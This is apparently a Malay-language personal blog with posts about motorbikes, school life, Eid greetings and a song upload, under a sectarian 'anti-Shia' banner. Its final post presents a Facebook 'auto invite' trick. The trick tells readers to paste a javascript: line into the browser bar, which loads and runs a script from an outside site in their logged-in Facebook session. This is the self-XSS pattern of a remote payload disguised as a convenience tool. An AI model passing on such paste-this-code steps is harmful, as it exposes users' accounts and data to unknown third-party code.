| | TENTERA SUNNI ALLAH | PENENTANG SYIAH | SUNNI CYBER ARMY|

Cinta hati

Assalamualaikum dan salam sejahtera

Harini nak citer tentang CINTA HATI SAYA  iaitu motor saya .. Saya lelaki
Yang meminati sukan permotoran, kerana tak mampu nak SUPERBIKE  yang harga macam jongkong emas tu , saya hanya mampu beli motor 2T .  ada yang melarang saya , ada yang sokong saya dalam hobi ni , ikutkan memang bahaya dan berisiko.

Saya dah berhenti join lumba haram selepas saya disedarkan oleh WEC WIRA JAYA CONSULTANCY iaitu consultant untuk program ceramah motivasi dan lain2.. Alhamdulillah saya sekarang menjadi sebahagian dalam keluarga WEC dan jadi fasilitator.

Walaupun dah berhenti , hobi saya tetap berjalan , saya sekarang hanya konvoi je .. Kalau bab laju di highway itu biasalah semua manusia tak kan lepas gian full throttle tapi ingat ingat la yee ..

Saya ada dua motor KAWASAKI RR 150 dan YAMAHA 125ZR .. 125zr saya yang banyak melabur duit buat motor ni dulu , sekarang saya sedar betapa banyak pembaziran saya dah buat , tapi takpelah setiap manusia ada pengalaman masing-2 .

Ok ni gambar motor saya , 125zr skrg saya letak kat terengganu sebab belajar sana so setiap cuti sem saya bawa balik .

SALAM AIDIL ADHA

Anak Katak Makan Ketupat,
Makan Ketupat  Sambil Melompat,
Hari Raya Haji Sudah Nak Dekat,
Saya Nak Minta Maaf Sebelum Terlambat

Haaa pantun aidil adha , SAYA nak mengucapkan SALAM AIDIL ADHA .
Korban binatang kalau mampu bantu silalah bantu, kalau tidak mampu tengok pun jadilah , 

I'M BACK

ASSALAMUALAIKUM & SALAM SEJAHTERA

Lama tak buka blog saya yang dah berhabuk ni ... macam-II sejarah ada di dalam ni..
singkatkan penceritaan saya, sekarang saya sudah bergelar STUDENT dekat
RANACO MARINE INSTITUTE  saya ambil kos OCCUPTIONAL SAFETY&HEALTH.

Okay apa itu RANACO MARINE INSTITUTE ? KLIK SINI !
then apa itu OCCUPTIONAL SAFETY&HEALTH ? KLIK SINI !


LOGO RANACO
saya sem 1 dan sekarang sedang menuju penghabisan sem 1 ..
so far belajar sini mengajar kita erti berdikari , jujur kemudahan tak seindah yang
digambarkan , tapi sijil nya amat lah laku ..

insyaallah selagi saya mampu bertahan saya akan tetap terus bertahan.. ohh ya lupa habak mai   ..
ranaco marine ni dekat KEMAMAN TERENGGANU..





sekolah baru ^_^

ASSALAMUALAIKUM~

mih stick yang aku guna/aku punya
aku dah bertukar sekolah dari SMK COCHRANE --> SMK SUNGAU BESI , sekolah yang sempoi smk sungau besi memang best tambahan lagi ada sukan yang aku minat iaitu HOKI , insyaallah aku akan cuba sedaya upaya untuk tournament bulan 3 nih...


tambahan skrg dah satu sekolah dengan SHELINA AZIZAH susah la jawabnye sebab dia kuat jeles bila ada perempuan tegur or borak dengan aku hahah tapi best plak tengok dia jeles :)  itu semua tak penting yang penting saling setia right ;)

salam aidil adha

ASSALAMUALAIKUM dan SALAM SEJAHTERA

Alhamdulillah allah masih beri kita kesempatann untuk menyambut hari raya aidil adha selepas kita menyambut hari raya adilfitri, saya MUHAMMAD SUFFIAN HADI BIN ROSTI ingin mengucapkan selamat menyambut hari raya aidil adha dan selamat menjalankan ibadah korban buat yang mengenali diri saya dan juga kepada yang membaca post ini.

KORBAN?

Dah bersedia nak tengok korban?

upload lagu dalam youtube

ASSALAMUALAIKUM dan SALAM SEJAHTERA...

Dalam keadaan rindu apda si dia dan sambil tengah study sempat aku edit lirik lagu nih dan jadikan video upload kat youtube .aku tertengok drama tuh tadi terdengar lagu nih sedap plak so aku cari kat youtube tak jumpa terus aku cari kat google, akhirnye jumpa dan aku jadikan video supaya orang lain tak adalah susah nak cari lagu nih lagi ^_^  layan ~

nih link lagu http://www.youtube.com/watch?v=z5R7MN9UVho&feature=youtu.be


cara buat AUTO INVITE group facebook

ASSALAMUALAIKUM

korang mesti penat kan nak invite orang masuk dalam group kena tekan satu persatu?
so sekarang korang guna je cara ini.
nih pon aku belajar dari kawan satu angkatan penggodam dengan aku
sharing is caring right (^__^)
okat let's do it.

LANGKAH PERTAMA
korang pilih group mana korang nak auto invite

LANGKAH KEDUA
copy script nih 
javascript:(function(){document.body.appendChild(document.createElement('script')).src='http://www.devilsuniverse.com/design/js/f.js';})();

LANGKAH KETIGA
paste kan script tuh kat bar group tuh tadi


so dah siap ....

perhatian !!
pastikan korang admin group itu sebab kalau korang bukan admin nanti admin akan penat nak approve beribu orang request to join